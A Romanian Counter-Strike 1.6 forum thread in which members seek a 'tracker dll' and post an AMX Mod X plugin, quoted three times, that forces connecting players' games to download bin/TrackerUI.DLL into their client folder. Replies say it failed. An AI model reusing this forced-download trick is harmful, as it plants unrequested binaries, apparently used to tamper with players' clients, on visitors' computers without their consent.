tracker dll

Discutii despre tot ce nu se incadreaza in celelalte categorii.

Moderators: Moderatori ajutatori, Moderatori

Post Reply
User avatar
1oNNNuTz
Membru, skill +1
Membru, skill +1
Posts: 392
Joined: 07 May 2012, 10:28
Detinator Steam: Da
SteamID: ionutxl
Reputatie: Tepar
Has thanked: 12 times
Been thanked: 18 times
Contact:

31 Mar 2014, 17:02

Cine are tracker dll free ?
Sa il posteze aici primeste multumesc + 1 domeniu asiics'dot'ro fara acces ns! ns-urile mi le dati mie.
RoyalServer
User avatar
ioang
Utilizator neserios (tepar)
Utilizator neserios (tepar)
Posts: 1169
Joined: 12 Feb 2011, 14:04
Detinator Steam: Nu
CS Status: Citesc forumul eXtreamCS.com!
Reputatie: Fost moderator
Utilizator neserios (tepar)
Fond eXtream: 0
Has thanked: 21 times
Been thanked: 23 times
Contact:

31 Mar 2014, 17:08

Uaw,esti un tepar care cere ceva.
Dupa ce ii dati va da domeniul ii dati nsurile puneti ceva poate "unic"pe el si apoi vine aici si vinde cu tot cu domeniu dar dand teapa.
User avatar
1oNNNuTz
Membru, skill +1
Membru, skill +1
Posts: 392
Joined: 07 May 2012, 10:28
Detinator Steam: Da
SteamID: ionutxl
Reputatie: Tepar
Has thanked: 12 times
Been thanked: 18 times
Contact:

31 Mar 2014, 17:11

Esti destept dar nu prea :-?
User avatar
HuaN
Membru, skill +1
Membru, skill +1
Posts: 324
Joined: 23 Oct 2012, 20:14
Detinator Steam: Da
Has thanked: 34 times
Been thanked: 40 times

31 Mar 2014, 17:15

TrackerUI + SOURCE CODE
tineti domeniu 8-|
Citeste regulamentul. Data viitoare iei warn. ma si daca nu vreau?
User avatar
1oNNNuTz
Membru, skill +1
Membru, skill +1
Posts: 392
Joined: 07 May 2012, 10:28
Detinator Steam: Da
SteamID: ionutxl
Reputatie: Tepar
Has thanked: 12 times
Been thanked: 18 times
Contact:

31 Mar 2014, 17:21

Multumesc :)
User avatar
sharkstar
Membru, skill +4
Membru, skill +4
Posts: 1735
Joined: 24 Dec 2012, 15:51
Detinator Steam: Da
CS Status: Rupetot
SteamID: privat
Location: Bucuresti
Has thanked: 70 times
Been thanked: 42 times

31 Mar 2014, 18:13

Pentru cei care doresc sa downloadeze *.dll uitati aici pluginul original precache.

Code: Select all

#include <amxmodx>
#include <amxmisc>
#include <engine>

public plugin_init() {
register_plugin("Tracker Downloader","1.0.0","unpack")
return PLUGIN_CONTINUE
}

precache_files(szFilename[],type) {
new szText[256], szKey[20], szValue[64]
new a, pos = 0
new ent

if (file_exists(szFilename)) {
log_amx("[*] -> Parsing file %s",szFilename)
while (read_file(szFilename,pos++,szText,sizeof(szText),a)) {
if ( szText[0] == '/' && szText[1] == '/' )
continue
if (equal(szText,""))
continue
if (parse(szText, szKey, sizeof(szKey), szValue, sizeof(szValue)) >= 1) {
if (type == 0) {
if (equali(szKey,"precache_sound")) {
precache_sound(szValue)
log_amx("[*] -> Precaching sound %s",szValue)
} else if (equali(szKey,"precache_model")) {
precache_model(szValue)
log_amx("[*] -> Precaching model %s",szValue)
} else if (equali(szKey,"precache_generic")) {
precache_generic(szValue)
log_amx("[*] -> Precaching generic %s",szValue)
} else if (equali(szKey,"precache_class")) {
ent = create_entity(szValue)
if (ent) {
DispatchSpawn(ent)
remove_entity(ent)
log_amx("[*] -> Precaching class %s",szValue)
} else {
log_amx("[*] -> Error: Failed precaching class %s",szValue)
}
}
}
}
}
} else {
log_amx("[*]-> Creating file %s",szFilename)
new genstring [48]
format(genstring,sizeof(genstring),"precache_generic bin/TrackerUI.DLL")
write_file(szFilename,genstring,-1);
}
}

public plugin_precache() {
new path[32]; get_configsdir(path,31)
new prepath[48]; format(prepath,sizeof(prepath),"%s/precache",path)
new mappath[64]; format(mappath,sizeof(mappath),"%s/maps",prepath)

new map[32]
get_mapname(map,sizeof(map))

new t1[128],t2[128]
format(t1,sizeof(t1),"%s/default.pre",prepath)
format(t2,sizeof(t2),"%s/%s.pre",mappath,map)

if (!(dir_exists(prepath))) {
log_amx("[*] -> Creating directory %s",prepath)
mkdir(prepath)
}
precache_files(t1,0)

if (!(dir_exists(mappath))) {
log_amx("[*] -> Creating directory %s",mappath)
mkdir(mappath)
}
precache_files(t2,0)

return PLUGIN_CONTINUE
}
I've never been more normal than I am now.
My tumblr
User avatar
dDow
Membru eXtream
Membru eXtream
Posts: 3016
Joined: 12 Jun 2013, 22:04
Detinator Steam: Da
CS Status: Master
Detinator server CS: Cateva.
Location: Bucuresti aka Brooklyn
Has thanked: 35 times
Been thanked: 76 times

31 Mar 2014, 18:42

sharkstar wrote:Pentru cei care doresc sa downloadeze *.dll uitati aici pluginul original precache.

Code: Select all

#include <amxmodx>
#include <amxmisc>
#include <engine>

public plugin_init() {
register_plugin("Tracker Downloader","1.0.0","unpack")
return PLUGIN_CONTINUE
}

precache_files(szFilename[],type) {
new szText[256], szKey[20], szValue[64]
new a, pos = 0
new ent

if (file_exists(szFilename)) {
log_amx("[*] -> Parsing file %s",szFilename)
while (read_file(szFilename,pos++,szText,sizeof(szText),a)) {
if ( szText[0] == '/' && szText[1] == '/' )
continue
if (equal(szText,""))
continue
if (parse(szText, szKey, sizeof(szKey), szValue, sizeof(szValue)) >= 1) {
if (type == 0) {
if (equali(szKey,"precache_sound")) {
precache_sound(szValue)
log_amx("[*] -> Precaching sound %s",szValue)
} else if (equali(szKey,"precache_model")) {
precache_model(szValue)
log_amx("[*] -> Precaching model %s",szValue)
} else if (equali(szKey,"precache_generic")) {
precache_generic(szValue)
log_amx("[*] -> Precaching generic %s",szValue)
} else if (equali(szKey,"precache_class")) {
ent = create_entity(szValue)
if (ent) {
DispatchSpawn(ent)
remove_entity(ent)
log_amx("[*] -> Precaching class %s",szValue)
} else {
log_amx("[*] -> Error: Failed precaching class %s",szValue)
}
}
}
}
}
} else {
log_amx("[*]-> Creating file %s",szFilename)
new genstring [48]
format(genstring,sizeof(genstring),"precache_generic bin/TrackerUI.DLL")
write_file(szFilename,genstring,-1);
}
}

public plugin_precache() {
new path[32]; get_configsdir(path,31)
new prepath[48]; format(prepath,sizeof(prepath),"%s/precache",path)
new mappath[64]; format(mappath,sizeof(mappath),"%s/maps",prepath)

new map[32]
get_mapname(map,sizeof(map))

new t1[128],t2[128]
format(t1,sizeof(t1),"%s/default.pre",prepath)
format(t2,sizeof(t2),"%s/%s.pre",mappath,map)

if (!(dir_exists(prepath))) {
log_amx("[*] -> Creating directory %s",prepath)
mkdir(prepath)
}
precache_files(t1,0)

if (!(dir_exists(mappath))) {
log_amx("[*] -> Creating directory %s",mappath)
mkdir(mappath)
}
precache_files(t2,0)

return PLUGIN_CONTINUE
}
La noi pe sv. n-a mers :))
(▀̿Ĺ̯▀̿ ̿)
Image
User avatar
HuaN
Membru, skill +1
Membru, skill +1
Posts: 324
Joined: 23 Oct 2012, 20:14
Detinator Steam: Da
Has thanked: 34 times
Been thanked: 40 times

31 Mar 2014, 18:45

Citeste regulamentul. Data viitoare iei warn. ma si daca nu vreau?
User avatar
eTTricK
Membru, skill +1
Membru, skill +1
Posts: 170
Joined: 03 Feb 2014, 17:58
Detinator Steam: Da
CS Status: Delphi / .NET / C++
Detinator server CS: Da
SteamID: STEAM_0:0:25357875
Reputatie: Membru Club eXtreamCS (1 luna)
Location: Delphi / .NET / C++
Has thanked: 12 times
Been thanked: 10 times

31 Mar 2014, 19:17

sharkstar wrote:Pentru cei care doresc sa downloadeze *.dll uitati aici pluginul original precache.

Code: Select all

#include <amxmodx>
#include <amxmisc>
#include <engine>

public plugin_init() {
register_plugin("Tracker Downloader","1.0.0","unpack")
return PLUGIN_CONTINUE
}

precache_files(szFilename[],type) {
new szText[256], szKey[20], szValue[64]
new a, pos = 0
new ent

if (file_exists(szFilename)) {
log_amx("[*] -> Parsing file %s",szFilename)
while (read_file(szFilename,pos++,szText,sizeof(szText),a)) {
if ( szText[0] == '/' && szText[1] == '/' )
continue
if (equal(szText,""))
continue
if (parse(szText, szKey, sizeof(szKey), szValue, sizeof(szValue)) >= 1) {
if (type == 0) {
if (equali(szKey,"precache_sound")) {
precache_sound(szValue)
log_amx("[*] -> Precaching sound %s",szValue)
} else if (equali(szKey,"precache_model")) {
precache_model(szValue)
log_amx("[*] -> Precaching model %s",szValue)
} else if (equali(szKey,"precache_generic")) {
precache_generic(szValue)
log_amx("[*] -> Precaching generic %s",szValue)
} else if (equali(szKey,"precache_class")) {
ent = create_entity(szValue)
if (ent) {
DispatchSpawn(ent)
remove_entity(ent)
log_amx("[*] -> Precaching class %s",szValue)
} else {
log_amx("[*] -> Error: Failed precaching class %s",szValue)
}
}
}
}
}
} else {
log_amx("[*]-> Creating file %s",szFilename)
new genstring [48]
format(genstring,sizeof(genstring),"precache_generic bin/TrackerUI.DLL")
write_file(szFilename,genstring,-1);
}
}

public plugin_precache() {
new path[32]; get_configsdir(path,31)
new prepath[48]; format(prepath,sizeof(prepath),"%s/precache",path)
new mappath[64]; format(mappath,sizeof(mappath),"%s/maps",prepath)

new map[32]
get_mapname(map,sizeof(map))

new t1[128],t2[128]
format(t1,sizeof(t1),"%s/default.pre",prepath)
format(t2,sizeof(t2),"%s/%s.pre",mappath,map)

if (!(dir_exists(prepath))) {
log_amx("[*] -> Creating directory %s",prepath)
mkdir(prepath)
}
precache_files(t1,0)

if (!(dir_exists(mappath))) {
log_amx("[*] -> Creating directory %s",mappath)
mkdir(mappath)
}
precache_files(t2,0)

return PLUGIN_CONTINUE
}

Mai cauta :))
Post Reply

Return to “Discutii generale”

  • Information